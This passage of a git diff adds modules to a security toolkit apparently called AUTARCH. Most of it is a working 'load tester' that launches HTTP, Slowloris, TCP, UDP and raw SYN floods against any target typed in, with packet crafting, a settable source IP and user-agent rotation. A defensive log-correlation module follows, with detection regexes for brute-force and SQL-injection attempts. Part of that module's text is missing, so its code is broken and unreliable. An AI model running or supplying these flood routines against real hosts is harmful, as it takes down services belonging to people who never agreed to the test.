metric updates.""" + if q in self._subscribers: + self._subscribers.remove(q) + + def _publish(self, data: dict): + """Publish data to all subscribers.""" + dead = [] + for q in self._subscribers: + try: + q.put_nowait(data) + except queue.Full: + dead.append(q) + for q in dead: + self._subscribers.remove(q) + + def _launch_workers(self, attack_type: str, total_workers: int, + ramp: str, ramp_dur: float): + """Launch worker threads according to ramp pattern.""" + worker_fn = { + 'http_flood': self._http_worker, + 'slowloris': self._slowloris_worker, + 'tcp_connect': self._tcp_worker, + 'udp_flood': self._udp_worker, + 'syn_flood': self._syn_worker, + }.get(attack_type, self._http_worker) + + if ramp == 'constant' or ramp_dur <= 0: + for i in range(total_workers): + if self._stop_event.is_set(): + break + t = threading.Thread(target=worker_fn, args=(i,), daemon=True) + t.start() + self._workers.append(t) + with self._metrics_lock: + self._metrics.active_workers = len(self._workers) + elif ramp == 'linear': + interval = ramp_dur / max(total_workers, 1) + for i in range(total_workers): + if self._stop_event.is_set(): + break + t = threading.Thread(target=worker_fn, args=(i,), daemon=True) + t.start() + self._workers.append(t) + with self._metrics_lock: + self._metrics.active_workers = len(self._workers) + time.sleep(interval) + elif ramp == 'step': + steps = min(5, total_workers) + per_step = total_workers // steps + step_interval = ramp_dur / steps + for s in range(steps): + if self._stop_event.is_set(): + break + count = per_step if s < steps - 1 else total_workers - len(self._workers) + for i in range(count): + if self._stop_event.is_set(): + break + t = threading.Thread(target=worker_fn, args=(len(self._workers),), daemon=True) + t.start() + self._workers.append(t) + with self._metrics_lock: + self._metrics.active_workers = len(self._workers) + time.sleep(step_interval) + elif ramp == 'spike': + # Burst 50%, wait, add remaining + burst = total_workers // 2 + for i in range(burst): + if self._stop_event.is_set(): + break + t = threading.Thread(target=worker_fn, args=(i,), daemon=True) + t.start() + self._workers.append(t) + with self._metrics_lock: + self._metrics.active_workers = len(self._workers) + time.sleep(ramp_dur / 2) + for i in range(burst, total_workers): + if self._stop_event.is_set(): + break + t = threading.Thread(target=worker_fn, args=(i,), daemon=True) + t.start() + self._workers.append(t) + with self._metrics_lock: + self._metrics.active_workers = len(self._workers) + + # Wait for duration or stop + duration = self._config.get('duration', 0) + if duration > 0: + start = time.time() + while time.time() - start < duration and not self._stop_event.is_set(): + time.sleep(0.5) + self.stop() + + def _collect_results(self): + """Collect results from worker threads.""" + while self._running or not self._result_queue.empty(): + try: + result = self._result_queue.get(timeout=0.5) + except queue.Empty: + continue + + with self._metrics_lock: + m = self._metrics + m.total_requests += 1 + m.elapsed = time.time() - m.start_time + m.bytes_sent += result.bytes_sent + m.bytes_received += result.bytes_received + + if result.success: + m.successful += 1 + else: + m.failed += 1 + err_key = result.error[:50] if result.error else 'unknown' + m.errors[err_key] = m.errors.get(err_key, 0) + 1 + + if result.status_code: + m.status_codes[result.status_code] = m.status_codes.get(result.status_code, 0) + 1 + + if result.latency_ms > 0: + # Keep last 10000 latencies for percentile calculation + if len(m.latencies) > 10000: + m.latencies = m.latencies[-5000:] + m.latencies.append(result.latency_ms) + + self._rps_counter += 1 + + # Publish update every 20 requests + if m.total_requests % 20 == 0: + self._publish({'type': 'metrics', 'data': m.to_dict()}) + + def _track_rps(self): + """Track requests per second over time.""" + while self._running: + time.sleep(1) + with self._metrics_lock: + now = time.time() + elapsed = now - self._rps_timer_start + if elapsed >= 1.0: + current_rps = self._rps_counter / elapsed + self._metrics.rps_history.append(round(current_rps, 1)) + if len(self._metrics.rps_history) > 120: + self._metrics.rps_history = self._metrics.rps_history[-60:] + self._rps_counter = 0 + self._rps_timer_start = now + + def _should_continue(self, request_count: int) -> bool: + """Check if worker should continue.""" + if self._stop_event.is_set(): + return False + max_req = self._config.get('requests_per_worker', 0) + if max_req > 0 and request_count >= max_req: + return False + return True + + def _rate_limit_wait(self): + """Apply rate limiting if configured.""" + rate = self._config.get('rate_limit', 0) + if rate > 0: + workers = self._config.get('workers', 1) + per_worker = rate / max(workers, 1) + if per_worker > 0: + time.sleep(1.0 / per_worker) + + def _get_session(self) -> 'requests.Session': + """Create an HTTP session with configuration.""" + if not REQUESTS_AVAILABLE: + raise RuntimeError("requests library not available") + + session = requests.Session() + adapter = HTTPAdapter( + pool_connections=10, + pool_maxsize=10, + max_retries=0, + ) + session.mount('http://', adapter) + session.mount('https://', adapter) + session.verify = self._config.get('verify_ssl', False) + + # Custom headers + headers = self._config.get('headers', {}) + if headers: + session.headers.update(headers) + + if self._config.get('rotate_useragent', True): + session.headers['User-Agent'] = random.choice(USER_AGENTS) + elif self._config.get('custom_useragent'): + session.headers['User-Agent'] = self._config['custom_useragent'] + + return session + + def _http_worker(self, worker_id: int): + """HTTP flood worker — sends rapid HTTP requests.""" + target = self._config.get('target', '') + method = self._config.get('method', 'GET').upper() + body = self._config.get('body', '') + timeout = self._config.get('timeout', 10) + follow = self._config.get('follow_redirects', True) + count = 0 + + session = self._get_session() + + while self._should_continue(count): + self._pause_event.wait() + self._rate_limit_wait() + + if self._config.get('rotate_useragent', True): + session.headers['User-Agent'] = random.choice(USER_AGENTS) + + start = time.time() + result = RequestResult(timestamp=start) + + try: + resp = session.request( + method, target, + data=body if body else None, + timeout=timeout, + allow_redirects=follow, + ) + elapsed = (time.time() - start) * 1000 + + result.status_code = resp.status_code + result.latency_ms = elapsed + result.bytes_received = len(resp.content) + result.bytes_sent = len(body.encode()) if body else 0 + result.success = 200 <= resp.status_code < 500 + + except requests.Timeout: + result.error = "timeout" + result.latency_ms = timeout * 1000 + except requests.ConnectionError as e: + result.error = f"connection_error: {str(e)[:60]}" + except Exception as e: + result.error = str(e)[:80] + + self._result_queue.put(result) + count += 1 + + session.close() + + def _slowloris_worker(self, worker_id: int): + """Slowloris worker — holds connections open with partial headers.""" + parsed = urlparse(self._config.get('target', '')) + host = parsed.hostname or self._config.get('target', '') + port = parsed.port or (443 if parsed.scheme == 'https' else 80) + use_ssl = parsed.scheme == 'https' + timeout = self._config.get('timeout', 10) + + sockets: List[socket.socket] = [] + max_sockets = 50 # Per worker + + while self._should_continue(0): + self._pause_event.wait() + + # Create new sockets up to limit + while len(sockets) < max_sockets and not self._stop_event.is_set(): + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(timeout) + if use_ssl: + ctx = ssl.create_default_context() + ctx.check_hostname = False + ctx.verify_mode = ssl.CERT_NONE + sock = ctx.wrap_socket(sock, server_hostname=host) + sock.connect((host, port)) + + # Send partial HTTP request + ua = random.choice(USER_AGENTS) + sock.send(f"GET /?{random.randint(0, 9999)} HTTP/1.1\r\n".encode()) + sock.send(f"Host: {host}\r\n".encode()) + sock.send(f"User-Agent: {ua}\r\n".encode()) + sock.send(b"Accept-language: en-US,en;q=0.5\r\n") + + sockets.append(sock) + result = RequestResult( + success=True, timestamp=time.time(), + bytes_sent=200, latency_ms=0 + ) + self._result_queue.put(result) + except Exception as e: + result = RequestResult( + error=str(e)[:60], timestamp=time.time() + ) + self._result_queue.put(result) + break + + # Keep connections alive with partial headers + dead = [] + for i, sock in enumerate(sockets): + try: + header = f"X-a: {random.randint(1, 5000)}\r\n" + sock.send(header.encode()) + except Exception: + dead.append(i) + + # Remove dead sockets + for i in sorted(dead, reverse=True): + try: + sockets[i].close() + except Exception: + pass + sockets.pop(i) + + time.sleep(random.uniform(5, 15)) + + # Cleanup + for sock in sockets: + try: + sock.close() + except Exception: + pass + + def _tcp_worker(self, worker_id: int): + """TCP connect flood worker — rapid connect/disconnect.""" + parsed = urlparse(self._config.get('target', '')) + host = parsed.hostname or self._config.get('target', '').split(':')[0] + try: + port = parsed.port or int(self._config.get('target', '').split(':')[-1]) + except (ValueError, IndexError): + port = 80 + timeout = self._config.get('timeout', 5) + payload_size = self._config.get('payload_size', 0) + count = 0 + + while self._should_continue(count): + self._pause_event.wait() + self._rate_limit_wait() + + start = time.time() + result = RequestResult(timestamp=start) + + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(timeout) + sock.connect((host, port)) + + if payload_size > 0: + data = random.randbytes(payload_size) + sock.send(data) + result.bytes_sent = payload_size + + elapsed = (time.time() - start) * 1000 + result.latency_ms = elapsed + result.success = True + + sock.close() + except socket.timeout: + result.error = "timeout" + result.latency_ms = timeout * 1000 + except ConnectionRefusedError: + result.error = "connection_refused" + except Exception as e: + result.error = str(e)[:60] + + self._result_queue.put(result) + count += 1 + + def _udp_worker(self, worker_id: int): + """UDP flood worker — sends UDP packets.""" + target = self._config.get('target', '') + host = target.split(':')[0] if ':' in target else target + try: + port = int(target.split(':')[1]) if ':' in target else 80 + except (ValueError, IndexError): + port = 80 + payload_size = self._config.get('payload_size', 1024) + count = 0 + + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + + while self._should_continue(count): + self._pause_event.wait() + self._rate_limit_wait() + + start = time.time() + result = RequestResult(timestamp=start) + + try: + data = random.randbytes(payload_size) + sock.sendto(data, (host, port)) + elapsed = (time.time() - start) * 1000 + result.latency_ms = elapsed + result.bytes_sent = payload_size + result.success = True + except Exception as e: + result.error = str(e)[:60] + + self._result_queue.put(result) + count += 1 + + sock.close() + + @staticmethod + def _checksum(data: bytes) -> int: + """Calculate IP/TCP checksum.""" + if len(data) % 2: + data += b'\x00' + s = 0 + for i in range(0, len(data), 2): + s += (data[i] << 8) + data[i + 1] + s = (s >> 16) + (s & 0xffff) + s += s >> 16 + return ~s & 0xffff + + def _build_syn_packet(self, src_ip: str, dst_ip: str, + src_port: int, dst_port: int) -> bytes: + """Build a raw TCP SYN packet (IP header + TCP header).""" + # IP Header (20 bytes) + ip_ihl_ver = (4 << 4) + 5 # IPv4, IHL=5 (20 bytes) + ip_tos = 0 + ip_tot_len = 40 # 20 IP + 20 TCP + ip_id = random.randint(1, 65535) + ip_frag_off = 0 + ip_ttl = 64 + ip_proto = socket.IPPROTO_TCP + ip_check = 0 + ip_saddr = socket.inet_aton(src_ip) + ip_daddr = socket.inet_aton(dst_ip) + + ip_header = struct.pack('!BBHHHBBH4s4s', + ip_ihl_ver, ip_tos, ip_tot_len, ip_id, + ip_frag_off, ip_ttl, ip_proto, ip_check, + ip_saddr, ip_daddr) + # Recalculate IP checksum + ip_check = self._checksum(ip_header) + ip_header = struct.pack('!BBHHHBBH4s4s', + ip_ihl_ver, ip_tos, ip_tot_len, ip_id, + ip_frag_off, ip_ttl, ip_proto, ip_check, + ip_saddr, ip_daddr) + + # TCP Header (20 bytes) + tcp_seq = random.randint(0, 0xFFFFFFFF) + tcp_ack_seq = 0 + tcp_doff = 5 # Data offset: 5 words (20 bytes) + tcp_flags = 0x02 # SYN + tcp_window = socket.htons(5840) + tcp_check = 0 + tcp_urg_ptr = 0 + tcp_offset_res = (tcp_doff << 4) + 0 + + tcp_header = struct.pack('!HHLLBBHHH', + src_port, dst_port, tcp_seq, tcp_ack_seq, + tcp_offset_res, tcp_flags, tcp_window, + tcp_check, tcp_urg_ptr) + + # Pseudo header for TCP checksum + pseudo = struct.pack('!4s4sBBH', + ip_saddr, ip_daddr, 0, ip_proto, 20) + tcp_check = self._checksum(pseudo + tcp_header) + tcp_header = struct.pack('!HHLLBBHHH', + src_port, dst_port, tcp_seq, tcp_ack_seq, + tcp_offset_res, tcp_flags, tcp_window, + tcp_check, tcp_urg_ptr) + + return ip_header + tcp_header + + def _syn_worker(self, worker_id: int): + """SYN flood worker — sends raw TCP SYN packets. + + Requires elevated privileges (admin/root) for raw sockets. + Falls back to TCP connect flood if raw socket creation fails. + """ + target = self._config.get('target', '') + host = target.split(':')[0] if ':' in target else target + try: + port = int(target.split(':')[1]) if ':' in target else 80 + except (ValueError, IndexError): + port = 80 + + # Resolve target IP + try: + dst_ip = socket.gethostbyname(host) + except socket.gaierror: + result = RequestResult(error=f"Cannot resolve {host}", timestamp=time.time()) + self._result_queue.put(result) + return + + # Source IP: user-specified or auto-detect local IP + src_ip = self._config.get('source_ip', '').strip() + if not src_ip: + try: + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((dst_ip, 80)) + src_ip = s.getsockname()[0] + s.close() + except Exception: + src_ip = '127.0.0.1' + + # Try to create raw socket + try: + import sys + if sys.platform == 'win32': + # Windows raw sockets + sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP) + sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) + else: + sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) + sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) + except PermissionError: + # Fall back to TCP connect flood + self._tcp_worker(worker_id) + return + except OSError as e: + result = RequestResult( + error=f"Raw socket failed (need admin/root): {e}", timestamp=time.time() + ) + self._result_queue.put(result) + # Fall back + self._tcp_worker(worker_id) + return + + count = 0 + while self._should_continue(count): + self._pause_event.wait() + self._rate_limit_wait() + + start = time.time() + result = RequestResult(timestamp=start) + + try: + src_port = random.randint(1024, 65535) + packet = self._build_syn_packet(src_ip, dst_ip, src_port, port) + sock.sendto(packet, (dst_ip, 0)) + + elapsed = (time.time() - start) * 1000 + result.latency_ms = elapsed + result.bytes_sent = len(packet) + result.success = True + except Exception as e: + result.error = str(e)[:60] + + self._result_queue.put(result) + count += 1 + + sock.close() + + +# Singleton +_load_tester: Optional[LoadTester] = None + + +def get_load_tester() -> LoadTester: + global _load_tester + if _load_tester is None: + _load_tester = LoadTester() + return _load_tester + + +def _clear(): + import os + os.system('cls' if os.name == 'nt' else 'clear') + + +def _format_bytes(b: int) -> str: + if b < 1024: + return f"{b} B" + elif b < 1024 * 1024: + return f"{b / 1024:.1f} KB" + elif b < 1024 * 1024 * 1024: + return f"{b / (1024 * 1024):.1f} MB" + return f"{b / (1024 * 1024 * 1024):.2f} GB" + + +def run(): + """Interactive CLI for the load testing module.""" + from core.banner import Colors + + tester = get_load_tester() + + while True: + _clear() + print(f"\n{Colors.RED} ╔══════════════════════════════════════╗{Colors.RESET}") + print(f"{Colors.RED} ║ AUTARCH Load Tester ║{Colors.RESET}") + print(f"{Colors.RED} ╚══════════════════════════════════════╝{Colors.RESET}") + print() + + if tester.running: + m = tester.metrics + print(f" {Colors.GREEN}● TEST RUNNING{Colors.RESET} Workers: {m.active_workers} Elapsed: {m.elapsed:.0f}s") + print(f" {Colors.CYAN}RPS: {m.rps:.1f} Total: {m.total_requests} OK: {m.successful} Fail: {m.failed}{Colors.RESET}") + print(f" {Colors.DIM}Avg: {m.avg_latency:.1f}ms P95: {m.p95_latency:.1f}ms P99: {m.p99_latency:.1f}ms{Colors.RESET}") + print(f" {Colors.DIM}Sent: {_format_bytes(m.bytes_sent)} Recv: {_format_bytes(m.bytes_received)}{Colors.RESET}") + print() + print(f" {Colors.WHITE}1{Colors.RESET} — View live metrics") + print(f" {Colors.WHITE}2{Colors.RESET} — Pause / Resume") + print(f" {Colors.WHITE}3{Colors.RESET} — Stop test") + print(f" {Colors.WHITE}0{Colors.RESET} — Back (test continues)") + else: + print(f" {Colors.WHITE}1{Colors.RESET} — HTTP Flood") + print(f" {Colors.WHITE}2{Colors.RESET} — Slowloris") + print(f" {Colors.WHITE}3{Colors.RESET} — TCP Connect Flood") + print(f" {Colors.WHITE}4{Colors.RESET} — UDP Flood") + print(f" {Colors.WHITE}5{Colors.RESET} — SYN Flood (requires admin)") + print(f" {Colors.WHITE}6{Colors.RESET} — Quick Test (HTTP GET)") + print(f" {Colors.WHITE}0{Colors.RESET} — Back") + + print() + try: + choice = input(f" {Colors.WHITE}Select: {Colors.RESET}").strip() + except (EOFError, KeyboardInterrupt): + break + + if choice == '0' or not choice: + break + + if tester.running: + if choice == '1': + _show_live_metrics(tester) + elif choice == '2': + if tester._pause_event.is_set(): + tester.pause() + print(f"\n {Colors.YELLOW}[!] Test paused{Colors.RESET}") + else: + tester.resume() + print(f"\n {Colors.GREEN}[+] Test resumed{Colors.RESET}") + time.sleep(1) + elif choice == '3': + tester.stop() + _show_final_report(tester) + else: + if choice == '1': + _configure_and_run(tester, 'http_flood') + elif choice == '2': + _configure_and_run(tester, 'slowloris') + elif choice == '3': + _configure_and_run(tester, 'tcp_connect') + elif choice == '4': + _configure_and_run(tester, 'udp_flood') + elif choice == '5': + _configure_and_run(tester, 'syn_flood') + elif choice == '6': + _quick_test(tester) + + +def _configure_and_run(tester: LoadTester, attack_type: str): + """Interactive configuration and launch.""" + from core.banner import Colors + + print(f"\n{Colors.BOLD} Configure {attack_type.replace('_', ' ').title()}{Colors.RESET}") + print(f"{Colors.DIM} {'─' * 40}{Colors.RESET}\n") + + src_ip = '' + try: + if attack_type == 'http_flood': + target = input(f" Target URL: ").strip() + if not target: + return + if not target.startswith('http'): + target = 'http://' + target + method = input(f" Method [GET]: ").strip().upper() or 'GET' + body = '' + if method in ('POST', 'PUT'): + body = input(f" Body: ").strip() + elif attack_type == 'syn_flood': + print(f" {Colors.YELLOW}[!] SYN flood requires administrator/root privileges{Colors.RESET}") + target = input(f" Target (host:port): ").strip() + if not target: + return + src_ip = input(f" Source IP (blank=auto): ").strip() + method = '' + body = '' + elif attack_type in ('tcp_connect', 'udp_flood'): + target = input(f" Target (host:port): ").strip() + if not target: + return + method = '' + body = '' + elif attack_type == 'slowloris': + target = input(f" Target URL or host:port: ").strip() + if not target: + return + if not target.startswith('http') and ':' not in target: + target = 'http://' + target + method = '' + body = '' + else: + target = input(f" Target: ").strip() + if not target: + return + method = '' + body = '' + + workers_s = input(f" Workers [10]: ").strip() + workers = int(workers_s) if workers_s else 10 + + duration_s = input(f" Duration in seconds [30]: ").strip() + duration = int(duration_s) if duration_s else 30 + + ramp_s = input(f" Ramp pattern (constant/linear/step/spike) [constant]: ").strip() + ramp = ramp_s if ramp_s in ('constant', 'linear', 'step', 'spike') else 'constant' + + rate_s = input(f" Rate limit (req/s, 0=unlimited) [0]: ").strip() + rate_limit = int(rate_s) if rate_s else 0 + + config = { + 'target': target, + 'attack_type': attack_type, + 'workers': workers, + 'duration': duration, + 'method': method, + 'body': body, + 'ramp_pattern': ramp, + 'rate_limit': rate_limit, + 'timeout': 10, + 'rotate_useragent': True, + 'verify_ssl': False, + 'follow_redirects': True, + 'payload_size': 1024, + 'source_ip': src_ip if attack_type == 'syn_flood' else '', + } + + print(f"\n {Colors.YELLOW}[!] Starting {attack_type} against {target}{Colors.RESET}") + print(f" {Colors.DIM}Workers: {workers} Duration: {duration}s Ramp: {ramp}{Colors.RESET}") + confirm = input(f"\n {Colors.WHITE}Confirm? (y/n) [y]: {Colors.RESET}").strip().lower() + if confirm == 'n': + return + + tester.start(config) + _show_live_metrics(tester) + + except (ValueError, EOFError, KeyboardInterrupt): + print(f"\n {Colors.YELLOW}[!] Cancelled{Colors.RESET}") + time.sleep(1) + + +def _quick_test(tester: LoadTester): + """Quick HTTP GET test with defaults.""" + from core.banner import Colors + + try: + target = input(f"\n Target URL: ").strip() + if not target: + return + if not target.startswith('http'): + target = 'http://' + target + + config = { + 'target': target, + 'attack_type': 'http_flood', + 'workers': 10, + 'duration': 10, + 'method': 'GET', + 'body': '', + 'ramp_pattern': 'constant', + 'rate_limit': 0, + 'timeout': 10, + 'rotate_useragent': True, + 'verify_ssl': False, + 'follow_redirects': True, + } + + print(f"\n {Colors.YELLOW}[!] Quick test: 10 workers × 10 seconds → {target}{Colors.RESET}") + tester.start(config) + _show_live_metrics(tester) + + except (EOFError, KeyboardInterrupt): + pass + + +def _show_live_metrics(tester: LoadTester): + """Display live-updating metrics in the terminal.""" + from core.banner import Colors + import sys + + print(f"\n {Colors.GREEN}● LIVE METRICS {Colors.DIM}(Press Ctrl+C to return to menu){Colors.RESET}\n") + + try: + while tester.running: + m = tester.metrics + rps_bar = '█' * min(int(m.rps / 10), 40) + + sys.stdout.write('\033[2K\r') # Clear line + sys.stdout.write( + f" {Colors.CYAN}RPS: {m.rps:>7.1f}{Colors.RESET} " + f"{Colors.DIM}{rps_bar}{Colors.RESET} " + f"Total: {m.total_requests:>8} " + f"{Colors.GREEN}OK: {m.successful}{Colors.RESET} " + f"{Colors.RED}Fail: {m.failed}{Colors.RESET} " + f"Avg: {m.avg_latency:.0f}ms " + f"P95: {m.p95_latency:.0f}ms " + f"Workers: {m.active_workers}" + ) + sys.stdout.flush() + time.sleep(0.5) + except KeyboardInterrupt: + pass + + print() + if not tester.running: + _show_final_report(tester) + + +def _show_final_report(tester: LoadTester): + """Display final test results.""" + from core.banner import Colors + + m = tester.metrics + print(f"\n{Colors.BOLD} ─── Test Complete ───{Colors.RESET}\n") + print(f" Total Requests: {m.total_requests}") + print(f" Successful: {Colors.GREEN}{m.successful}{Colors.RESET}") + print(f" Failed: {Colors.RED}{m.failed}{Colors.RESET}") + print(f" Duration: {m.elapsed:.1f}s") + print(f" Avg RPS: {m.rps:.1f}") + print(f" Data Sent: {_format_bytes(m.bytes_sent)}") + print(f" Data Received: {_format_bytes(m.bytes_received)}") + print() + print(f" {Colors.CYAN}Latency:{Colors.RESET}") + print(f" Min: {m.min_latency:.1f}ms") + print(f" Avg: {m.avg_latency:.1f}ms") + print(f" P50: {m.p50_latency:.1f}ms") + print(f" P95: {m.p95_latency:.1f}ms") + print(f" P99: {m.p99_latency:.1f}ms") + print(f" Max: {m.max_latency:.1f}ms") + + if m.status_codes: + print(f"\n {Colors.CYAN}Status Codes:{Colors.RESET}") + for code, count in sorted(m.status_codes.items()): + color = Colors.GREEN if 200 <= code < 300 else Colors.YELLOW if 300 <= code < 400 else Colors.RED + print(f" {color}{code}{Colors.RESET}: {count}") + + if m.errors: + print(f"\n {Colors.RED}Top Errors:{Colors.RESET}") + for err, count in sorted(m.errors.items(), key=lambda x: -x[1])[:5]: + print(f" {count}× {err}") + + print() + try: + input(f" {Colors.WHITE}Press Enter to continue...{Colors.RESET}") + except (EOFError, KeyboardInterrupt): + pass diff --git a/modules/log_correlator.py b/modules/log_correlator.py new file mode 100644 index 0000000..ab10bd1 --- /dev/null +++ b/modules/log_correlator.py @@ -0,0 +1,551 @@ +"""AUTARCH Log Correlator + +Syslog ingestion, pattern matching, anomaly detection, alert rules, +timeline correlation, and mini-SIEM functionality. +""" + +DESCRIPTION = "Log correlation & anomaly detection (mini-SIEM)" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "defense" + +import os +import re +import json +import time +import threading +from pathlib import Path +from datetime import datetime, timezone +from collections import Counter, defaultdict +from typing import Dict, List, Optional, Any + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + +# ── Built-in Detection Rules ──────────────────────────────────────────────── + +DEFAULT_RULES = [ + { + 'id': 'brute_force_ssh', + 'name': 'SSH Brute Force', + 'pattern': r'(Failed password|authentication failure).*ssh', + 'severity': 'high', + 'threshold': 5, + 'window_seconds': 60, + 'description': 'Multiple failed SSH login attempts' + }, + { + 'id': 'brute_force_web', + 'name': 'Web Login Brute Force', + 'pattern': r'(401|403).*POST.*(login|auth|signin)', + 'severity': 'high', + 'threshold': 10, + 'window_seconds': 60, + 'description': 'Multiple failed web login attempts' + }, + { + 'id': 'sql_injection', + 'name': 'SQL Injection Attempt', + 'pattern': r"(UNION\s+SELECT|OR\s+1\s*=\s*1|DROP\s+TABLE|'--|\bSLEEP\()", + 'severity': 'critical', + 'threshold': 1, + 'window_seconds': 0, + 'description': 'SQL injection pattern detected' + }, + { + 'id': 'xss_attempt', + 'name': 'XSS Attempt', + 'pattern': r'( Optional[Dict]: + """Parse a single log line.""" + line = line.strip() + if not line: + return None + + # Try JSON format + if LogParser.JSON_LOG_RE.match(line): + try: + data = json.loads(line) + return { + 'format': 'json', + 'timestamp': data.get('timestamp', data.get('time', data.get('@timestamp', ''))), + 'source': data.get('source', data.get('host', '')), + 'program': data.get('program', data.get('service', data.get('logger', ''))), + 'message': data.get('message', data.get('msg', str(data))), + 'level': data.get('level', data.get('severity', 'info')), + 'raw': line + } + except json.JSONDecodeError: + pass + + # Try syslog format + m = LogParser.SYSLOG_RE.match(line) + if m: + return { + 'format': 'syslog', + 'timestamp': m.group(1), + 'source': m.group(2), + 'program': m.group(3), + 'pid': m.group(4), + 'message': m.group(5), + 'raw': line + } + + # Try Apache/Nginx format + m = LogParser.APACHE_RE.match(line) + if m: + return { + 'format': 'apache', + 'timestamp': m.group(2), + 'source': m.group(1), + 'method': m.group(3), + 'path': m.group(4), + 'status': int(m.group(5)), + 'size': int(m.group(6)), + 'message': line, + 'raw': line + } + + # Generic fallback + return { + 'format': 'unknown', + 'timestamp': '', + 'message': line, + 'raw': line + } + + +# ── Log Correlator Engine ──────────────────────────────────────────────────── + +class LogCorrelator: + """Log correlation and anomaly detection engine.""" + + def __init__(self): + self.data_dir = os.path.join(get_data_dir(), 'log_correlator') + os.makedirs(self.data_dir, exist_ok=True) + + self.rules: List[Dict] = list(DEFAULT_RULES) + self.alerts: List[Dict] = [] + self.logs: List[Dict] = [] + self.sources: Dict[str, Dict] = {} + self._rule_hits: Dict[str, List[float]] = defaultdict(list) + self._lock = threading.Lock() + self._load_custom_rules() + self._load_alerts() + + def _load_custom_rules(self): + rules_file = os.path.join(self.data_dir, 'custom_rules.json') + if os.path.exists(rules_file): + try: + with open(rules_file) as f: + custom = json.load(f) + self.rules.extend(custom) + except Exception: + pass + + def _save_custom_rules(self): + # Only save non-default rules + default_ids = {r['id'] for r in DEFAULT_RULES} + custom = [r for r in self.rules if r['id'] not in default_ids] + rules_file = os.path.join(self.data_dir, 'custom_rules.json') + with open(rules_file, 'w') as f: + json.dump(custom, f, indent=2) + + def _load_alerts(self): + alerts_file = os.path.join(self.data_dir, 'alerts.json') + if os.path.exists(alerts_file): + try: + with open(alerts_file) as f: + self.alerts = json.load(f) + except Exception: + pass + + def _save_alerts(self): + alerts_file = os.path.join(self.data_dir, 'alerts.json') + with open(alerts_file, 'w') as f: + json.dump(self.alerts[-1000:], f, indent=2) + + # ── Log Ingestion ──────────────────────────────────────────────────── + + def ingest_file(self, filepath: str, source_name: str = None) -> Dict: + """Ingest log file for analysis.""" + if not os.path.exists(filepath): + return {'ok': False, 'error': 'File not found'} + + source = source_name or Path(filepath).name + parsed = 0 + alerts_generated = 0 + + try: + with open(filepath, 'r', errors='ignore') as f: + for line in f: + entry = LogParser.parse_line(line) + if entry: + entry['source_file'] = source + self.logs.append(entry) + parsed += 1 + + # Run detection rules + new_alerts = self._check_rules(entry) + alerts_generated += len(new_alerts) + + self.sources[source] = { + 'file': filepath, + 'lines': parsed, + 'ingested': datetime.now(timezone.utc).isoformat() + } + + if alerts_generated: + self._save_alerts() + + return { + 'ok': True, 'source': source, + 'lines_parsed': parsed, + 'alerts_generated': alerts_generated + } + + except Exception as e: + return {'ok': False, 'error': str(e)} + + def ingest_text(self, text: str, source_name: str = 'paste') -> Dict: + """Ingest log text directly.""" + parsed = 0 + alerts_generated = 0 + + for line in text.strip().splitlines(): + entry = LogParser.parse_line(line) + if entry: + entry['source_file'] = source_name + self.logs.append(entry) + parsed += 1 + new_alerts = self._check_rules(entry) + alerts_generated += len(new_alerts) + + if alerts_generated: + self._save_alerts() + + return { + 'ok': True, 'source': source_name, + 'lines_parsed': parsed, + 'alerts_generated': alerts_generated + } + + # ── Detection ──────────────────────────────────────────────────────── + + def _check_rules(self, entry: Dict) -> List[Dict]: + """Check log entry against detection rules.""" + new_alerts = [] + message = entry.get('message', '') + ' ' + entry.get('raw', '') + now = time.time() + + for rule in self.rules: + try: + if re.search(rule['pattern'], message, re.I): + rule_id = rule['id'] + + # Threshold check + if rule.get('threshold', 1) > 1 and rule.get('window_seconds', 0) > 0: + with self._lock: + self._rule_hits[rule_id].append(now) + # Clean old hits + window = rule['window_seconds'] + self._rule_hits[rule_id] = [ + t for t in self._rule_hits[rule_id] + if now - t <= window + ] + if len(self._rule_hits[rule_id]) < rule['threshold']: + continue + + alert = { + 'timestamp': datetime.now(timezone.utc).isoformat(), + 'rule_id': rule_id, + 'rule_name': rule['name'], + 'severity': rule['severity'], + 'description': rule['description'], + 'source': entry.get('source_file', ''), + 'log_entry': entry.get('message', '')[:200], + 'raw': entry.get('raw', '')[:300] + } + self.alerts.append(alert) + new_alerts.append(alert) + except re.error: + pass + + return new_alerts + + # ── Rule Management ────────────────────────────────────────────────── + + def add_rule(self, rule_id: str, name: str, pattern: str, + severity: str = 'medium', threshold: int = 1, + window_seconds: int = 0, description: str = '') -> Dict: + """Add custom detection rule.""" + # Validate regex + try: + re.compile(pattern) + except re.error as e: + return {'ok': False, 'error': f'Invalid regex: {e}'} + + rule = { + 'id': rule_id, 'name': name, 'pattern': pattern, + 'severity': severity, 'threshold': threshold, + 'window_seconds': window_seconds, + 'description': description + } + self.rules.append(rule) + self._save_custom_rules() + return {'ok': True, 'rule': rule} + + def remove_rule(self, rule_id: str) -> Dict: + """Remove a custom rule.""" + default_ids = {r['id'] for r in DEFAULT_RULES} + if rule_id in default_ids: + return {'ok': False, 'error': 'Cannot remove built-in rule'} + + before = len(self.rules) + self.rules = [r for r in self.rules if r['id'] != rule_id] + if len(self.rules) < before: + self._save_custom_rules() + return {'ok': True} + return {'ok': False, 'error': 'Rule not found'} + + def get_rules(self) -> List[Dict]: + """List all detection rules.""" + default_ids = {r['id'] for r in DEFAULT_RULES} + return [{**r, 'builtin': r['id'] in default_ids} for r in self.rules] + + # ── Analysis ───────────────────────────────────────────────────────── + + def search_logs(self, query: str, source: str = None, + limit: int = 100) -> List[Dict]: + """Search ingested logs.""" + results = [] + for entry in reversed(self.logs): + if source and entry.get('source_file') != source: + continue + if query.lower() in (entry.get('message', '') + entry.get('raw', '')).lower(): + results.append(entry) + if len(results) >= limit: + break + return results + + def get_stats(self) -> Dict: + """Get correlator statistics.""" + severity_counts = Counter(a['severity'] for a in self.alerts) + rule_counts = Counter(a['rule_id'] for a in 